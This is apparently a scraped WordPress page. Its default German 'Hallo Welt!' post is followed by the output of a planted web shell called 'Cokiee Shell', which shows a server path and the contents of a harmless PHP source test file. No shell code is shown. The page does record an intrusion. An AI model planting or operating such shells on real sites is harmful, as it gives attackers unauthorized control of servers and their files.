Willkommen bei WordPress. Dies ist dein erster Beitrag. Bearbeite oder lösche ihn und beginne mit dem Schreiben!
Hallo Welt!
von raredesign | Dez 3, 2019 | Allgemein | 0 Kommentare
Cokiee Shell
Current Path : /usr/local/src/php7/php-7.0.5/ext/standard/tests/file/ |
Current File : //usr/local/src/php7/php-7.0.5/ext/standard/tests/file/php_fd_wrapper_03.phpt |
--TEST-- php://fd wrapper: bad syntax --FILE-- <?php fopen("php://fd", "w"); fopen("php://fd/", "w"); fopen("php://fd/-2", "w"); fopen("php://fd/1/", "w"); echo "\nDone.\n"; --EXPECTF-- Warning: fopen(): Invalid php:// URL specified in %s on line %d Warning: fopen(php://fd): failed to open stream: operation failed in %s on line 2 Warning: fopen(php://fd/): failed to open stream: php://fd/ stream must be specified in the form php://fd/<orig fd> in %s on line %d Warning: fopen(php://fd/-2): failed to open stream: The file descriptors must be non-negative numbers smaller than %d in %s on line %d Warning: fopen(php://fd/1/): failed to open stream: php://fd/ stream must be specified in the form php://fd/<orig fd> in %s on line %d Done.
Cokiee Shell Web 1.0, Coded By Razor
Neueste Kommentare